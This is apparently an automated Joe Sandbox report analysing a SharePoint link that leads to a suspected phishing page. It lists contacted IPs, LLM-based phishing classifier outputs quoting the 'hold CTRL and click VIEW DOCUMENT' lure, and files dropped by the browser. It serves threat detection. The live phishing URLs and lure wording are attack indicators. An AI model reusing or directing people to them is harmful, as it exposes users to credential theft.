                                                        		unknownEuropean Union
                                                        		1273CWVodafoneGroupPLCEUfalse
                                                        172.217.16.129
                                                        		googlehosted.l.googleusercontent.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.250.186.163
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        94.245.104.56
                                                        		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.108.89.16
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.108.8.12
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        64.233.167.84
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        52.108.11.12
                                                        		wac-0003.wac-dc-msedge.netUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        188.114.96.3
                                                        		alinefrasca.sbsEuropean Union
                                                        		13335CLOUDFLARENETUSfalse
                                                        95.101.54.226
                                                        		unknownEuropean Union
                                                        		34164AKAMAI-LONGBfalse

                                                        Private

                                                        IP
                                                        192.168.2.17

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1545996
                                                        Start date and time:2024-10-31 11:11:00 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                        Sample URL:https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:35
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • EGA enabled
                                                        Analysis Mode:stream
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal48.phis.win@85/236@60/362

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): TextInputHost.exe
                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.186.142, 64.233.167.84
                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, 200073-ipv4v6e.farm.dprodmgd107.sharepointonline.com.akadns.net, clientservices.googleapis.com, clients.l.google.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                        • VT rate limit hit for: https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4

                                                        LLM Input / Output

                                                        InputOutput
                                                        URL: Model: claude-3-5-sonnet-latest
                                                        {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                                        URL: URL: https://dzentec-my.sharepoint.com
                                                        URL: https://dzentec-my.sharepoint.com/personal/i_lahmer_entec-dz_com/_layouts/15/Doc.aspx?sourcedoc=%7B8ce429d6-fa50-49ec-8af9-cf02a4b3bf8d%7D&action=default&slrid=c0435fa1-1082-0000-2d67-d62c612b4258&originalPath=aHR0cHM6Ly9kemVudGVjLW15LnNoYXJlcG9pbnQuY29tL Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": true,
  "trigger_text": "PLEASE HOLD CTRL BUTTON ON YOUR KEYBOARD AND CLICK ON VIEW DOCUMENT TO ACCESS CONTRACT PROPOSAL",
  "prominent_button_name": "VIEW DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: https://dzentec-my.sharepoint.com/personal/i_lahmer_entec-dz_com/_layouts/15/Doc.aspx?sourcedoc=%7B8ce429d6-fa50-49ec-8af9-cf02a4b3bf8d%7D&action=default&slrid=c0435fa1-1082-0000-2d67-d62c612b4258&originalPath=aHR0cHM6Ly9kemVudGVjLW15LnNoYXJlcG9pbnQuY29tL Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": []
}
```

The provided image does not contain any visible brands or logos. The page appears to be a simple text-based interface with a "VIEW DOCUMENT" button and instructions to access a contract proposal.
                                                        URL: https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?rtime=_YMVaZT53Eg Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": true,
  "trigger_text": "PLEASE HOLD CTRL BUTTON ON YOUR KEYBOARD AND CLICK ON VIEW DOCUMENT TO ACCESS CONTRACT PROPOSAL",
  "prominent_button_name": "VIEW DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Verifying...",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: Model: claude-3-5-sonnet-latest
                                                        {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}
                                                        URL: URL: https://alinefrasca.sbs
                                                        URL: https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?rtime=_YMVaZT53Eg Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": []
}
```

The provided image does not contain any visible brand logos or identifiable brand names. The image appears to be a blank webpage with a message instructing the user to "PLEASE HOLD CTRL BUTTON ON YOUR KEYBOARD AND CLICK ON VIEW DOCUMENT TO ACCESS CONTRACT PROPOSAL". There are no brand elements detected in this image.
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Browser checks in progress for secure access.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Browse Inventory",
  "text_input_field_labels": [
    "Full Name",
    "Email",
    "Message"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Send Message",
  "text_input_field_labels": [
    "Full Name",
    "Email",
    "Message"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": [
    "Adrenaline Rush Motorsports"
  ]
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                        ```json
{
  "brands": [
    "Adrenaline Rush Motorsports"
  ]
}
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: gpt-4o
                                                        ```json{  "legit_domain": "adrenalinerushmotorsports.com",  "classification": "unknown",  "reasons": [    "The URL 'alinefrasca.sbs' does not match the expected domain for 'Adrenaline Rush Motorsports'.",    "The domain extension '.sbs' is unusual for a legitimate business and could be a red flag.",    "The brand 'Adrenaline Rush Motorsports' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.",    "The URL does not contain any recognizable elements of the brand name, which is suspicious.",    "The presence of generic input fields like 'Full Name', 'Email', and 'Message' is common in phishing sites."  ],  "riskscore": 8}
                                                        URL: alinefrasca.sbs
            Brands: Adrenaline Rush Motorsports
            Input Fields: Full Name, Email, Message
                                                        URL: https://alinefrasca.sbs/pktcr/ Model: gpt-4o
                                                        ```json{  "legit_domain": "adrenalinerushmotorsports.com",  "classification": "unknown",  "reasons": [    "The brand 'Adrenaline Rush Motorsports' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.",    "The URL 'alinefrasca.sbs' does not match the expected domain for 'Adrenaline Rush Motorsports'.",    "The domain extension '.sbs' is unusual and not typically associated with legitimate business websites.",    "There is no clear association between the brand and the provided URL, which raises suspicion.",    "The URL does not contain any recognizable elements of the brand name, which is a common phishing tactic."  ],  "riskscore": 8}
                                                        URL: alinefrasca.sbs
            Brands: Adrenaline Rush Motorsports
            Input Fields: Full Name, Email, Message

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\048c2f24-84c3-44af-bd1b-7a57bba01486.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):64242
                                                        Entropy (8bit):6.103870078936447
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\16492a12-36b9-4724-ab97-e8ce8115c842.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):65907
                                                        Entropy (8bit):6.1046986761853805
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6889343829DB3969E2799429F48040D3
                                                        SHA1:5DEDB6CD4FF56FF20A2D5D082E66F1E1A20E05D5
                                                        SHA-256:ECCE6470294C3E95FAFA19F7A3352A0845CFDB898454DF2752C6A025BF1A3A8B
                                                        SHA-512:FD47323C2A5C5D60443A05329C9355F17920F8826874E903E60283773DB69951C42B5C4034C6F50829E6BB9D34B58F4C402B11DB392C90D6E99D418B79C76B83
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\289962d2-95ec-4ff5-b64a-7b5322c7a0d4.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):65701
                                                        Entropy (8bit):6.10276969380032
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:02124F461DC862EA265A93F71D719483
                                                        SHA1:64F325EF2E9C8603524272FC01CF0CC63138C494
                                                        SHA-256:AE01F379EEB88355BD9FA5380159D517B7638B39A3A9F3A35534A2AD508912C4
                                                        SHA-512:A92AAE21E29B52D8859546BF14E4320F05122DF503898034376F70756BC0788AF80CEDDB4E63D2CB1AEAFC856C0CAE6C37F8E561B4E9C2153E69D49CA35E3B6A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1730369591"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4dcc9691-7d3f-4427-bbe4-c1d35ddf84b9.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):65701
                                                        Entropy (8bit):6.102757669126443
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:78025B777148E82E5D8ED192AA25820A
                                                        SHA1:4AC12E0DFEBD040C42EA9025B3BC128909DD72F2
                                                        SHA-256:8994F1B2C83AE9C865E8E871929E51D9D9F16D972FBB708966D61BE0FEB26C11
                                                        SHA-512:E6697B388EB71054ACC7A7513F774490D9DBA3DE4B81C0A2FCCDEF5A5D4140C1B761167685A70DBB39161E8D1CAF2B86E9FD87251B16FAD473F25479CB6C4E03
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1730369591"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\718bc4bf-4711-48bd-9db0-9671785d6475.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):64315
                                                        Entropy (8bit):6.104346601959304
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:01B9B2355E40993BFBEC217FFC021017
                                                        SHA1:729E955F73960BD28FA2F9ABC93F3F9ABDB12172
                                                        SHA-256:31737EFDD924A2F00FB9A511E30D2C4C1DC998A3FEA82143C48028718432A68B
                                                        SHA-512:881319E7AA9FB72CCAB928FB4D7A1EE01BF6B6627F9159439EB1BD01427DA61EF39D8ACD26469E8EDBB2D769CE77E0F7A66E382CB47BB2B584D8431E1A4AC0A7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7416a846-5429-4a69-9826-31bec4dc7b14.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):64315
                                                        Entropy (8bit):6.104350105036201
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2DEEBEE63286EBE95433A98E0076313B
                                                        SHA1:4AADB091533D32E1BDD8BB4B3CB14C666B5FE65F
                                                        SHA-256:A634505FDEBCE432970148D9CD233C13BF4417895B10F467637BF7F478B25022
                                                        SHA-512:FE67861038D757DF50DD2806DEE547AE6F9EF1CCE8FD24F3924C2025790DCE9C3ABA48613E801F3C75E75BC8316977D92329B9BE53E38CCF67B37A38C177881E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CF5F0871A3745A85317A43ECCC3E08B5
                                                        SHA1:D09B075E23832A146D9CA0E9C94FA25F1A6FC595
                                                        SHA-256:C3368F87F586F7BA42EA73C4438A60FB2A6F65873CC9801968A370CF025256AD
                                                        SHA-512:2E01C6EE2FE7BBE157F1A5FC172899DE97EFC2F18821E3F1DC1745E8FB4D0D907CCCDCD02F96E036AA5F61FBEDA2C7CB4F2F7F2D687D8D0BFD97CB6B211F715F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d4f5e60b-4322-409a-9961-4fb5ec5952b9.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):107893
                                                        Entropy (8bit):4.640156600019748
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CF5F0871A3745A85317A43ECCC3E08B5
                                                        SHA1:D09B075E23832A146D9CA0E9C94FA25F1A6FC595
                                                        SHA-256:C3368F87F586F7BA42EA73C4438A60FB2A6F65873CC9801968A370CF025256AD
                                                        SHA-512:2E01C6EE2FE7BBE157F1A5FC172899DE97EFC2F18821E3F1DC1745E8FB4D0D907CCCDCD02F96E036AA5F61FBEDA2C7CB4F2F7F2D687D8D0BFD97CB6B211F715F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67235833-162C.pma

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4194304
                                                        Entropy (8bit):0.04674683282401038
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BC58A2391F59A94092BBA7C991460957
                                                        SHA1:19438E4BA5A57B5EBDBB8F8A6CC0E2505A2BBB2F
                                                        SHA-256:14E74BB68EA969B117E7C9C3CBFA0ABF467D83B07E22F4283090624F167A62E3
